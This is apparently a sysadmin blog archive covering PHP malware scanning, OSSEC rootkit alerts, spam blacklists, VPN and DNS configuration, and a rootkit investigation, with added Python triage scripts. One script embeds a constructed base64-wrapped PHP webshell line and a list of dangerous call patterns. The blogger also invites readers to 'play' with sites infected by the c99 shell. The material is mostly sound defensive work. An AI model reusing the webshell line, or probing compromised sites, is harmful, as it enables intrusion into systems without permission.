scanning for base64_decode references

A friend’s site was recently hit by the massive infections/hacks on Dreamhost’s servers, so I decided to do some scanning for base64_decode references on some servers that I administer.

The simple command I used to find suspect files was:
# find . -name \*.php -exec grep -l "eval(base64_decode" {} \;

The results fell into just 2 categories: malware and stupidity. There was no base64_decode reference that did anything useful in any possible way.

The best malware I found was a slightly modified version of the c99 php shell on a hacked joomla installation (the site has been hacked multiple times but the client insists on just re-installing the same joomla installation over and over and always wonders how the hell do they find him and hack him…oh well). c99 is impressive though…excellent work. I won’t post the c99 shell here…google it, you can even find infected sites running it and you can “play” with them if you like…

And now comes the good part, stupidity.
My favorite php code containing a base64_decode reference that I found:

$hash  = 'aW5jbHVkZSgnLi4vLi';
$hash .= '4vaW5jX2NvbmYvY29u';
$hash .= 'Zi5pbmMucGhwJyk7aW';
$hash .= '5jbHVkZSgnLi4vLi4v';
$hash .= 'aW5jX2xpYi9kZWZhdW';
$hash .= 'x0LmluYy5waHAnKTtl';
$hash .= 'Y2hvICRwaHB3Y21zWy';
$hash .= 'd2ZXJzaW9uJ107';
eval(base64_decode($hash));

Let’s see what this little diamond does:


% base64 -d 
aW5jbHVkZSgnLi4vLi4vaW5jX2NvbmYvY29uZi5pbmMucGhwJyk7aW5jbHVkZSgnLi4vLi4vaW5jX2xpYi9kZWZhdWx0LmluYy5waHAnKTtlY2hvICRwaHB3Y21zWyd2ZXJzaW9uJ107
include('../../inc_conf/conf.inc.php');include('../../inc_lib/default.inc.php');echo $phpwcms['version'];

So this guy concatenated a series of strings into a base64 encoded string in order to prevent someone from changing the version tag of his software. That’s not software, that’s crapware. Hiding the code where the version string appears? That’s how you protect your software? COME OOOOON…
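A small triage script for the find/grep results above, added here as an example (not code from the original post): it replays the `=` / `.=` concatenation seen in the snippet, decodes whatever is handed to eval(base64_decode(...)) and flags dangerous calls, so a hit can be sorted into malware or stupidity without ever executing it. The phpwcms snippet is the one from the post; the webshell sample is the one-liner from the rootkit post further down, base64-wrapped here for the test.

```python
"""Triage eval(base64_decode(...)) hits in PHP files without running them."""
import base64
import binascii
import os
import re

# $name = '...';  or  $name .= "...";  (one literal per statement)
PIECE_RE = re.compile(r"""\$(\w+)\s*(\.?=)\s*(['"])(.*?)\3\s*;""", re.S)
# eval(base64_decode(<variable | string literal>))
EVAL_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(\$\w+|'[^']*'|"[^"]*")\s*\)\s*\)""")
# Calls that turn an obfuscated blob into a webshell (heuristic, not a PHP parser).
DANGEROUS = ("system(", "exec(", "passthru(", "shell_exec(", "popen(",
             "fsockopen(", "$_POST", "$_GET", "$_REQUEST", "$_COOKIE", "gzinflate(")

# The phpwcms snippet from the post above, wrapped in PHP tags.
SAMPLE_CRAPWARE = """<?php
$hash  = 'aW5jbHVkZSgnLi4vLi';
$hash .= '4vaW5jX2NvbmYvY29u';
$hash .= 'Zi5pbmMucGhwJyk7aW';
$hash .= '5jbHVkZSgnLi4vLi4v';
$hash .= 'aW5jX2xpYi9kZWZhdW';
$hash .= 'x0LmluYy5waHAnKTtl';
$hash .= 'Y2hvICRwaHB3Y21zWy';
$hash .= 'd2ZXJzaW9uJ107';
eval(base64_decode($hash));
?>"""
# Constructed: the one-line webshell from the rootkit post, base64-wrapped.
SAMPLE_SHELL = "<?php eval(base64_decode('%s')); ?>" % base64.b64encode(
    b'system($_SERVER["HTTP_SHELL"]);').decode("ascii")


def reassemble_strings(src):
    """Replay simple '=' and '.=' assignments to rebuild split string literals."""
    values = {}
    for name, op, _quote, piece in PIECE_RE.findall(src):
        values[name] = piece if op == "=" else values.get(name, "") + piece
    return values


def decode_payloads(src):
    """Return [(argument, decoded_text or None)] for each eval(base64_decode(...))."""
    values = reassemble_strings(src)
    findings = []
    for m in EVAL_RE.finditer(src):
        arg = m.group(1)
        encoded = values.get(arg[1:]) if arg.startswith("$") else arg[1:-1]
        decoded = None
        if encoded is not None:
            try:
                decoded = base64.b64decode(encoded, validate=True).decode("utf-8", "replace")
            except (binascii.Error, ValueError):
                decoded = None  # not valid base64: still worth a look by hand
        findings.append((arg, decoded))
    return findings


def classify(decoded):
    """Crude verdict: dangerous calls -> review as malware, else obfuscation only."""
    if decoded is None:
        return "undecodable"
    hits = [k for k in DANGEROUS if k in decoded]
    return "review: " + ", ".join(hits) if hits else "obfuscation only"


def scan_tree(root):
    """Walk a document root; return {path: [(arg, decoded, verdict), ...]} for hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = decode_payloads(fh.read())
            if found:
                report[path] = [(a, d, classify(d)) for a, d in found]
    return report


if __name__ == "__main__":
    for label, src in (("crapware", SAMPLE_CRAPWARE), ("webshell", SAMPLE_SHELL)):
        for arg, decoded in decode_payloads(src):
            print(f"{label}: {arg} -> {classify(decoded)}\n    {decoded}")
```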

Greek spammers’ email address blacklist

GrRBL
In the beginning of the year I announced my RBL for Greek spam emails. The blacklist is growing larger by the day, thanks to some really kind people forwarding me their Greek spam emails, and has reached more than 120 IP addresses of verified Greek spammers. This alone though is not enough.

Why
Some spammers use their ADSL lines, which have dynamic IPs, to send their massive email “newsletters”. These people are split into 2 sub-categories: the ones that use their own PC as an SMTP server and the ones who use their ISP’s mail server as SMTP. I’ve tried to complain to some of their ISPs…some replied back saying that they were willing to look into the issue (but did nothing at all in the end) and others did not even reply to me. For both sub-categories, GrRBL is ineffective since I can’t add dynamic IPs to the blacklist, nor can I add the IPs of the email servers of those major Greek ISPs.

Another category of spammers is the one that uses their gmail/yahoo accounts to send their emails. GrRBL is ineffective for this category as well since I can’t add gmail/yahoo to the blacklist…

What
So there was no alternative but to gather all those email addresses of these 2 categories above and add them to a new blacklist, one that will contain email addresses. I use this blacklist with my spamassassin configuration to eliminate Greek spam that GrRBL can’t. Each time I receive (or someone forwards me) a new Greek spam, I add the “From:” email address to this new blacklist. This new blacklist grows far more aggressively than GrRBL since it’s a lot easier to gather the data and already has more than 140 addresses.

Distribution
There are two available formats of the blacklist, one ready for use by spamassassin and another one with clear formatting ready to be used even by SMTPs to drop these spam emails without even touching your inbox.
The blacklist is currently only distributed to a group of well trusted people and it is available only through rsync with a username/password.

I don’t want to make the list completely public yet, but if you are interested you can request it at the contact email of GrRBL and I will reply to you about accessing it.

Sidenote
If you need a good tool to check a host against some RBLs, adnsrblcheck by Yiorgos Adamopoulos is the way to go (and it includes GrRBL!)

Using OpenVPN to route a specific subnet to the VPN

I have an OpenVPN server that has the push "redirect-gateway" directive. This directive changes the default gateway of the client to be the OpenVPN server, what I wanted though was to connect to the VPN and access only a specific subnet (eg. 100.200.100.0/24) through it without changing the server config (other people use it as a default gateway).

In the client config I removed the client directive and replaced it with these commands:
tls-client
ifconfig 172.18.0.6 172.18.0.5
route 172.18.0.0 255.255.255.0
route 100.200.100.0 255.255.255.0

What the previous lines do:
tls-client: Acts as a client! (“client” is an alias for “tls-client” + “pull”, but I don’t like what pull did: it changed my default route)
ifconfig 172.18.0.6 172.18.0.5: The tun0 interface will have ip 172.18.0.6 on our side and 172.18.0.5 on the server side. The IPs are not random, they are the ones OpenVPN used to assign to me while I was using the “client” directive.
route 172.18.0.0 255.255.255.0: Route all packets to 172.18.0.0 on the tun0 interface. In order to access services running on the OpenVPN server (172.18.0.1) I needed a route to them.
route 100.200.100.0 255.255.255.0: Route all packets to 100.200.100.0 on the tun0 interface

A traceroute to 100.200.100.1 now shows that I am accessing that subnet through the vpn.

Get adblocking back for archivum.info

If you have adblock enabled and you try to visit any url of www.archivum.info you will get a really nasty alert saying:

You Are Using Adblock Plus or some other advert blocking software! Archivum.info relies on advertising for revenue. Please add www.archivum.info to your ad blocking whitelist or disable ad blocking when you visit www.archivum.info.

When I first saw this I laughed…and then I tried to find a way to bypass it.
I used curl to see the site’s HTML code:

$ curl -v www.archivum.info
* About to connect() to www.archivum.info port 80 (#0)
*   Trying 69.147.224.162... connected
* Connected to www.archivum.info (69.147.224.162) port 80 (#0)
> GET / HTTP/1.1
> User-Agent: curl/7.19.5 (i486-pc-linux-gnu) libcurl/7.19.5 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15 libssh2/1.2
> Host: www.archivum.info
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 17 Nov 2009 11:24:22 GMT
< Server: Apache
< Last-Modified: Mon, 16 Nov 2009 08:41:17 GMT
< Accept-Ranges: bytes
< Content-Length: 9392
< Vary: Accept-Encoding
< Content-Type: text/html
< 
<html>
<head>
<title>archivum.info - The Internet archive.</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script type="text/javascript">var disabled = false;</script><script type="text/javascript" src="http://www.archivum.info/js/adblocker_probe.js?
site=http://googlead.foobar.tld/"></script><script type="text/javascript">if (disabled == false) { location.replace("http://www.archivum.info/denied");
alert("You Are Using Adblock Plus or some other advert blocking software! Archivum.info relies on advertising
for revenue. Please add www.archivum.info to your ad blocking whitelist or disable ad blocking when you visit
www.archivum.info.");}</script></head>

[snip]

Here’s how this site blocks Adblockplus: there’s a variable called disabled set to “false”, then if a js (http://www.archivum.info/js/adblocker_probe.js) runs it sets disabled to “true”. The hint is that adblockplus blocks urls starting with “googlead.”, so it won’t load “http://www.archivum.info/js/adblocker_probe.js?site=http://googlead.foobar.tld/” and the variable remains “false”. Then the alert pops up.

The solution is very simple, just add an exception to your local AdblockPlus rules, AdblockPlus Preferences -> Add Filter:
@@|http://www.archivum.info/js/adblocker_probe.js?site=http://googlead.foobar.tld/

So Firefox visits the js url, disabled becomes “true”, you are allowed to continue browsing the site and AdblockPlus continues blocking all blockable items.

Update on the “epic fail from a hosting company…” blog entry

For those who read my previous post, “Epic fail from a hosting company involving bad customer support and a critical security issue”: during the week some manager of the hosting company contacted the guy renting the servers and offered a free RAM upgrade for one server and a 60% monthly discount for 2 of the servers.

Not bad at all for the owner of the servers, but I still have many security-related concerns about the hosting company.

ossec to the rescue

That’s why I love ossec:

OSSEC HIDS Notification.
2009 Oct 06 17:45:17

Received From: XXXX->rootcheck
Rule: 510 fired (level 7) -> "Host-based anomaly detection event (rootcheck)."
Portion of the log(s):

Rootkit 'Suspicious' detected by the presence of file '/var/www/vhosts/YYYY.com/httpdocs/album_mod/..  /.../.log'.

 --END OF NOTIFICATION

OSSEC HIDS Notification.
2009 Oct 06 17:45:17

Received From: XXXX->rootcheck
Rule: 510 fired (level 7) -> "Host-based anomaly detection event (rootcheck)."
Portion of the log(s):

Rootkit 'Suspicious' detected by the presence of file '/var/www/vhosts/YYYY.com/httpdocs/language/lang_english/     /... /.log'.

 --END OF NOTIFICATION

OSSEC HIDS Notification.
2009 Oct 06 17:45:17

Received From: XXXX->rootcheck
Rule: 510 fired (level 7) -> "Host-based anomaly detection event (rootcheck)."
Portion of the log(s):

Rootkit 'Suspicious' detected by the presence of file '/var/www/vhosts/YYYY.com/httpdocs/language/     /... /.log'.

 --END OF NOTIFICATION

Just found this by copying some files for a client from his previous hosting company to one of the hosting servers of a company I work for.

There were actually 2 different sets of files.
The first one contained a tool that “hides” a process, called: “XH (XHide) process faker”, and the second one contained an iroffer executable.

Files:
i)xh-files.tar.gz
Listing:
.log/
.log/.crond/
.log/.crond/xh
.log/week~
.log/week

ii)iroffer-files.tar.gz
Listing:
.--/
.--/imd.pid
.--/imd.state.tmp
.--/imd.state
.--/linux

Mind the . (dot) of the directories containing the files.
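The same kind of hiding spot can be found without OSSEC by walking the web root; the script below is an added example (not from the post or from OSSEC) that flags names made only of dots, spaces and dashes (like the “..  ”, “...”, “.--” directories above), names with leading or trailing whitespace, and ELF binaries parked inside any dot-directory, which is where the xh and iroffer binaries were sitting. demo() builds a constructed tree shaped like the alerts above in a temp dir, scans it and cleans up.

```python
"""Find hidden directories of the kind OSSEC's rootcheck alerted on above."""
import os
import re
import shutil
import tempfile

ONLY_PUNCT = re.compile(r"^[.\s\-_~]+$")   # names such as '..  ', '...', '.--', '     '


def suspicious_name(name):
    """Reason a directory/file name looks like a hiding spot, or None."""
    if name in (".", ".."):
        return None
    if ONLY_PUNCT.match(name):
        return "name made only of dots/spaces/dashes"
    if name != name.strip():
        return "leading or trailing whitespace in name"
    return None


def is_elf(path):
    """True if the file starts with the ELF magic bytes."""
    try:
        with open(path, "rb") as fh:
            return fh.read(4) == b"\x7fELF"
    except OSError:
        return False


def find_suspicious(root):
    """Return sorted (relative_path, reason) pairs found under root."""
    findings = []
    for dirpath, dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        # Anything below a dot-directory counts as 'hidden' (rel_dir is '.' at the root).
        in_hidden = any(p.startswith(".") for p in rel_dir.split(os.sep) if p != ".")
        for d in dirs:
            reason = suspicious_name(d)
            if reason:
                findings.append((os.path.normpath(os.path.join(rel_dir, d)), reason))
        for f in files:
            rel = os.path.normpath(os.path.join(rel_dir, f))
            reason = suspicious_name(f)
            if reason:
                findings.append((rel, reason))
            elif in_hidden and is_elf(os.path.join(dirpath, f)):
                findings.append((rel, "ELF binary inside a dot-directory"))
    return sorted(findings)


def demo():
    """Constructed tree mimicking the three OSSEC alerts; returns the findings."""
    root = tempfile.mkdtemp(prefix="httpdocs-")
    try:
        layout = {
            "album_mod/..  /.../.log/.crond": [("xh", b"\x7fELF\x01\x01\x01" + b"\0" * 9)],
            "album_mod/..  /.../.log": [("week", b"0 * * * * /bin/true\n")],
            "language/lang_english/     /... /.log/.--": [("linux", b"\x7fELF" + b"\0" * 12),
                                                        ("imd.pid", b"4242\n")],
            "images": [("logo.png", b"\x89PNG\r\n\x1a\n")],
        }
        for d, files in layout.items():
            os.makedirs(os.path.join(root, d), exist_ok=True)
            for name, content in files:
                with open(os.path.join(root, d, name), "wb") as fh:
                    fh.write(content)
        return find_suspicious(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path!r}: {reason}")
```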

Epic fail from a hosting company involving bad customer support and a critical security issue

To cut the story as short as possible let’s say that someone rents some dedicated servers somewhere in a big hosting company. I occasionally do some administrative tasks for him.
A server stopped responding and was unbootable on October 1st, one disk had crashed, then the hosting company made a huge mistake, I notified them about it and then they made another even bigger mistake (security issue) on the next day, October 2nd. I re-notified them about it…
So you can either read the whole story or, if you are only interested in the security issue, skip the first day and go straight to October 2nd.

Some details: the server had 2 disks, sda with the OS (Debian 4.0) and the Plesk control panel, and sdb which held some backup files.

October 1st 2009:
10:10 I got a telephone call to help on that server because it looked dead and it couldn’t even be rebooted from the hosting company’s control panel.
10:15 I contacted the company’s support by email and notified them of the problem.
(more…)

resolv.conf options rotate and discovery of ISP DNS issue

Lately I somehow bumped into the manpage of resolv.conf. While reading it I saw the following really nice option:

rotate               sets  RES_ROTATE  in _res.options, which causes round robin selection of name‐
                     servers from among those listed.  This has the effect of spreading  the  query
                     load  among  all  listed servers, rather than having all clients try the first
                     listed server first every time.

Since then my /etc/resolv.conf on both Gentoo and Debian looks like this:
nameserver 194.177.210.10
nameserver 194.177.210.210
nameserver 194.177.210.211
options rotate

(I prefer using GrNET’s DNS servers than any others in Greece, especially for my laptop configuration. Since they allow recursion I can use them to avoid lousy DNS services provided by lousy DSL routers regardless of the ISP I am currently using, when I am “mobile” with my laptop.)

While using the above config I ran a ping command in one terminal and a tcpdump command in another to see what was actually happening. The result looked like this:
root@lola:~# tcpdump -ni eth1 port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), capture size 96 bytes
11:20:46.405694 IP 192.168.1.65.55154 > 194.177.210.210.53: 39212+ A? ntua.gr. (25)
11:20:46.444266 IP 194.177.210.210.53 > 192.168.1.65.55154: 39212* 1/5/8 A 147.102.222.210 (319)
11:20:46.484490 IP 192.168.1.65.56152 > 194.177.210.211.53: 50452+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:46.584171 IP 194.177.210.211.53 > 192.168.1.65.56152: 50452 ServFail 0/0/0 (46)
11:20:46.584449 IP 192.168.1.65.58597 > 194.177.210.10.53: 50452+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:46.624179 IP 194.177.210.10.53 > 192.168.1.65.58597: 50452 1/7/6 (357)
11:20:47.484420 IP 192.168.1.65.32818 > 194.177.210.10.53: 33179+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:47.524176 IP 194.177.210.10.53 > 192.168.1.65.32818: 33179 1/7/6 (357)
11:20:48.484483 IP 192.168.1.65.57670 > 194.177.210.210.53: 21949+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:48.524184 IP 194.177.210.210.53 > 192.168.1.65.57670: 21949 1/3/6 (271)
11:20:49.487610 IP 192.168.1.65.48966 > 194.177.210.211.53: 8619+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:49.534204 IP 194.177.210.211.53 > 192.168.1.65.48966: 8619 ServFail 0/0/0 (46)
11:20:49.534429 IP 192.168.1.65.49421 > 194.177.210.10.53: 8619+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:49.574138 IP 194.177.210.10.53 > 192.168.1.65.49421: 8619 1/7/6 (357)
11:20:50.494537 IP 192.168.1.65.52525 > 194.177.210.10.53: 3415+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:50.534145 IP 194.177.210.10.53 > 192.168.1.65.52525: 3415 1/7/6 (357)
11:20:51.494552 IP 192.168.1.65.40400 > 194.177.210.210.53: 4504+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:51.534205 IP 194.177.210.210.53 > 192.168.1.65.40400: 4504 1/3/6 (271)
11:20:52.494554 IP 192.168.1.65.42385 > 194.177.210.211.53: 48450+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:52.544197 IP 194.177.210.211.53 > 192.168.1.65.42385: 48450 ServFail 0/0/0 (46)
11:20:52.544409 IP 192.168.1.65.43773 > 194.177.210.10.53: 48450+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:52.584232 IP 194.177.210.10.53 > 192.168.1.65.43773: 48450 1/7/6 (357)

People who are used to reading tcpdump output will immediately point out the ServFail entries of the log. Server 194.177.210.211 refused to provide proper results for the PTR query of 210.222.102.147.in-addr.arpa.

Further investigation of the problem:

root@lola:~# dig ptr 210.222.102.147.in-addr.arpa @194.177.210.210
;; QUESTION SECTION:
;210.222.102.147.in-addr.arpa.  IN  PTR
;; ANSWER SECTION:
210.222.102.147.in-addr.arpa. 66841 IN  PTR achilles.noc.ntua.gr.

root@lola:~# dig ptr 210.222.102.147.in-addr.arpa @194.177.210.211
;; QUESTION SECTION:
;210.222.102.147.in-addr.arpa.  IN  PTR

root@lola:~# dig ptr 210.222.102.147.in-addr.arpa @194.177.210.10
;; QUESTION SECTION:
;210.222.102.147.in-addr.arpa.  IN  PTR
;; ANSWER SECTION:
210.222.102.147.in-addr.arpa. 86115 IN  PTR achilles.noc.ntua.gr.

It was obvious that 2 out of 3 DNS servers responded as they should and the other did not.
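The pattern in the capture above (ServFail from one server, then the same query id immediately retried against the next one) can be tallied automatically; this is an added example, not from the original post, that parses “tcpdump -ni eth1 port 53” lines and reports per-server counts plus the failovers. The sample is a constructed subset of the capture above with the same values.

```python
"""Spot a misbehaving nameserver in 'tcpdump -n port 53' output under options rotate."""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): (?P<id>\d+)(?P<flags>[+*]*) ?(?P<rest>.*)$")
RCODES = ("ServFail", "NXDomain", "Refused", "FormErr", "NotImp")

# Constructed subset of the capture above (same values, fewer lines).
SAMPLE = """\
11:20:46.405694 IP 192.168.1.65.55154 > 194.177.210.210.53: 39212+ A? ntua.gr. (25)
11:20:46.444266 IP 194.177.210.210.53 > 192.168.1.65.55154: 39212* 1/5/8 A 147.102.222.210 (319)
11:20:46.484490 IP 192.168.1.65.56152 > 194.177.210.211.53: 50452+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:46.584171 IP 194.177.210.211.53 > 192.168.1.65.56152: 50452 ServFail 0/0/0 (46)
11:20:46.584449 IP 192.168.1.65.58597 > 194.177.210.10.53: 50452+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:46.624179 IP 194.177.210.10.53 > 192.168.1.65.58597: 50452 1/7/6 (357)
11:20:47.484420 IP 192.168.1.65.32818 > 194.177.210.10.53: 33179+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:47.524176 IP 194.177.210.10.53 > 192.168.1.65.32818: 33179 1/7/6 (357)
11:20:48.484483 IP 192.168.1.65.57670 > 194.177.210.210.53: 21949+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:48.524184 IP 194.177.210.210.53 > 192.168.1.65.57670: 21949 1/3/6 (271)
11:20:49.487610 IP 192.168.1.65.48966 > 194.177.210.211.53: 8619+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:49.534204 IP 194.177.210.211.53 > 192.168.1.65.48966: 8619 ServFail 0/0/0 (46)
11:20:49.534429 IP 192.168.1.65.49421 > 194.177.210.10.53: 8619+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:49.574138 IP 194.177.210.10.53 > 192.168.1.65.49421: 8619 1/7/6 (357)
"""


def parse_line(line):
    """Describe one query or response line as a dict, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    words = rec["rest"].split()
    if rec["dport"] == "53":            # client -> server: a query, e.g. 'PTR? name. (46)'
        rec["kind"], rec["server"] = "query", rec["dst"]
        rec["qtype"], rec["qname"] = words[0].rstrip("?"), words[1]
    elif rec["sport"] == "53":          # server -> client: 'ServFail 0/0/0' or 'a/b/c ...'
        rec["kind"], rec["server"] = "response", rec["src"]
        rec["rcode"] = words[0] if words[0] in RCODES else "NoError"
    else:
        return None
    return rec


def analyze(capture):
    """Per-server counts and the list of (id, failed_server, retried_on) failovers."""
    stats = defaultdict(lambda: {"queries": 0, "answered": 0, "servfail": 0})
    failed = {}                          # query id -> server that returned ServFail
    failovers = []
    for line in capture.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        srv = stats[rec["server"]]
        if rec["kind"] == "query":
            srv["queries"] += 1
            # The resolver reuses the id when it retries on the next server.
            if rec["id"] in failed and failed[rec["id"]] != rec["server"]:
                failovers.append((rec["id"], failed.pop(rec["id"]), rec["server"]))
        elif rec["rcode"] == "ServFail":
            srv["servfail"] += 1
            failed[rec["id"]] = rec["server"]
        else:
            srv["answered"] += 1
    return dict(stats), failovers


def broken_servers(stats):
    """Servers that returned ServFail and never answered successfully."""
    return sorted(s for s, c in stats.items() if c["servfail"] and not c["answered"])


if __name__ == "__main__":
    stats, failovers = analyze(SAMPLE)
    for server, counts in sorted(stats.items()):
        print(server, counts)
    print("failovers:", failovers)
    print("broken:", broken_servers(stats))
```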

What I did was to notify a friend working as an administrator there (GrNET) and let him know of the problem. After some investigation, he later told me that the problem was related to dnssec issues, possibly a configuration error on RIPE’s side. As far as I know they had to temporarily disable dnssec on the 147.102 zone…I am not aware whether they fixed the problem (using dnssec) yet though.

I am really glad they acted as fast as possible regarding the solution of the problem :)

Uzbl to you too!

I’ve been trying uzbl for the last few days and I am pretty much impressed by how useful such a small application can be in certain usage cases!

I installed it on my Debian testing following this blog post: Installing uzbl on Debian Squeeze.
Be sure to run make install, else you’ll have no config and uzbl will be unusable!!!

The first place I used it was for the urlLauncher plugin of urxvt. On my .Xdefaults I have the following piece of code:
urxvt.perl-ext-common: default,matcher,-option-popup,-selection-popup,-readline
urxvt.matcher.button: 1
urxvt.urlLauncher: /usr/local/bin/urxvt-url.sh

and my /usr/local/bin/urxvt-url.sh contains:
#!/bin/sh
uzbl "$1"

Now every url on the console gets highlighted and I can open it with uzbl. And that means opening really fast!

Example:
urxvt terminal (tabbed by fluxbox) with some urls highlighted by the perl matcher plugin of urxvt:
urxvt-url-highlight

left clicking on one of the urls opens it with uzbl:
uzbl-window

Apart from that, I’ve started using uzbl to open links on instant messengers, IRC clients and in every other place that people send me simple links to check out or I need a fast browser instance. Some people might say that it looks like links2 graphical mode, but it’s NOT like opening urls with “links -G” because uzbl is based on webkit and that means it can deal with javascript, java, flash, whatever…

I just love the way you can keybind all the actions you want on it…on the example config that comes with it, you quit the browser by typing ZZ…how great is that ? :D

Some usage tips
1) Tabbed behavior (if you have fluxbox):
In ~/.config/uzbl/config add
bind t _ = spawn uzbl --uri %s
and in ~/.fluxbox/apps add the [group] tag before the [app] tag for uzbl like that:

[group]
 [app] (name=uzbl) (class=Uzbl)
  [Workspace]   {0} 
  [Head]    {0} 
  [Dimensions]  {800 1284}
  [Position]    (UPPERLEFT) {0 0}
  [Maximized]   {yes}
  [Jump]    {yes}
  [Close]   {yes}
[end]

Now the command t www.google.com inside uzbl, will open a new tabbed window of uzbl with www.google.com loaded in it.

2) Close uzbl window with ctrl+w
In ~/.config/uzbl/config add:

bind     ctrl+v ctrl+w    = exit

(press ctrl+v ctrl+w one after the other and you will get something like ^W in the file)

P.S. If you are a person that just came from the point and click windows world to the beautiful world of linux, or you are a person that loves bloated desktop managers like KDE/gnome/etc or bloated applications like firefox/iceweasel/konqueror don’t even think of installing it. You’ll never understand its value…
P.S.2. If Richard Stallman decided to browse the web and had an internet connection uzbl would probably be his browser of choice :P

how to use encrypted loop files with a gpg passphrase in Debian

Fast howto (mostly a note for personal use) on what’s needed on Debian to use an encrypted loop:

1. The necessary utilities (patched losetup)
# aptitude install loop-aes-utils
2. The necessary kernel-module
# aptitude install loop-aes-modules-2.6.30-1-686-bigmem
3. Create the keyfile (keep your computer as busy as possible while doing this to increase entropy)
# head -c 2925 /dev/urandom | uuencode -m - | head -n 66 | tail -n 65 | gpg --symmetric -a >/path/to/keyfile.gpg
4. Loopfile creation (10MB; the same file is used in the steps below)
# dd if=/dev/urandom of=/home/username/crypto-loop.img bs=1k count=10000
5. Initialize loopfile
# losetup -K /path/to/keyfile.gpg -e AES256 /dev/loop5 /home/username/crypto-loop.img
6. Format loopfile
# mke2fs /dev/loop5
7. Delete loop device
# losetup -d /dev/loop5
8. Create mount point for loopfile
# mkdir /mnt/crypto-loop
9. Add entry to fstab

/home/username/crypto-loop.img /mnt/crypto-loop ext2 defaults,noauto,user,loop=/dev/loop7,encryption=AES256,gpgkey=/path/to/keyfile.gpg 0 0

10. Try mounting the loopfile as user
$ mount /mnt/crypto-loop
11. Check it’s mounted properly
$ mount | grep -i aes

and use it!

P.S. Secure your keyfile.gpg, if it gets lost you won’t _ever_ be able to decrypt what was inside crypto-loop.img!

There’s a rootkit in the closet!

Part 1: Finding the rootkit

It’s Monday morning and I am out for coffee in downtown Thessaloniki, when a partner calls:
- On machine XXX mysqld is not starting since Saturday.
- Can I drink my coffee and come over later to check it ? Is it critical ?
- Nope, come over anytime you can…

Around 14:00 I go over to his company to check on the box. It’s a debian oldstable (etch) that runs apache2 with xoops CMS + zencart (version unknown), postfix, courier-imap(s)/pop3(s), bind9 and mysqld. You can call it a LAMP machine with a neglected CMS which is also running as a mailserver…

I log in as root, I do a ps ax and the first thing I notice is apache having more than 50 threads running. I shut apache2 down via /etc/init.d/apache2 stop. Then I start poking at mysqld. I can’t see it running in ps so I try starting it via the init.d script. Nothing…it hangs while trying to start. I suspect a failing disk so I use tune2fs -C 50 /dev/hda1 to force an e2fsck on boot and I reboot the machine. The box starts booting, it checks the fs, no errors found, it continues and hangs at starting mysqld. I break out of the process and am back at the login screen. I check the S.M.A.R.T. status of the disk via smartctl -a /dev/hda, all clear, no errors found. Then I try to start mysqld manually, it looks like it starts but when I try to connect to it via a mysql client I get no response. I try to move the /var/lib/mysql/ files to another location and to re-init the mysql database. Trying to start mysqld after all that, still nothing.

Then I try to downgrade mysql to the previous version. The apt-get process tries to stop mysqld before it replaces it with the older version and it hangs; I try to break out of the process but it’s impossible…after a few killall -9 mysqld_safe;killall -9 mysql; killall -9 mysqladmin it finally moves on, but when it tries to start the downgraded mysqld version it hangs once again. That’s totally weird…

I try to ldd /usr/sbin/mysqld and I notice a very strange library named /lib/ld-linuxv.so.1 in the output. I had never heard of that library name before so I google it. Nothing comes up. I check the output of ldd /usr/sbin/mysqld on another debian etch box I have and no library /lib/ld-linuxv.so.1 shows up. I am definitely looking at something that shouldn’t be there. And that’s a rootkit!

I ask some friends online but nobody has ever faced that library rootkit before. I try to find that file on the box but it’s nowhere to be seen inside /lib/…the rootkit hides itself pretty well. I can’t see it with ls /lib or echo /lib/*. The rootkit has probably patched the kernel functions that allow me to see it. Strangely though I was able to see it with ldd (more about the technical stuff in the second half of the post). I check some other executables in /usr/sbin with a for i in /usr/sbin/*;do ldd $i; done, and all of them appear to have /lib/ld-linuxv.so.1 as a library dependency. I try to reboot the box with a kernel other than the one it’s currently using but I get strange errors saying it can’t even find the hard disk.

I try to downgrade the “working” kernel in an attempt to boot the box cleanly without the rootkit. I first take backups of the kernel and initramfs which are about to be replaced, of course. When the apt-get procedure calls mkinitramfs in order to create the initramfs image I notice errors saying that it can’t delete the /tmp/mkinitramfs_UVWXYZ/lib/ld-linuxv.so.1 file, so rm fails and that makes mkinitramfs fail as well.

I decide that I am doing more harm than good to the machine at the time and that I should first get an image of the disk before I fiddle any more with it. So I shut the box down. I set up a new box with most of the services that should be running (mail + dns), so I had the option to check on the disk with the rootkit on my own time.

Part 2: Technical analysis
I. First look at the ld-linuxv.so.1 library

A couple of days later I put the disk into my box and made an image of each partition using dd:
dd if=/dev/sdb1 of=/mnt/image/part1 bs=64k

Then I could mount the image using loop to play with it:
mount -o loop /mnt/image/part1 /mnt/part1

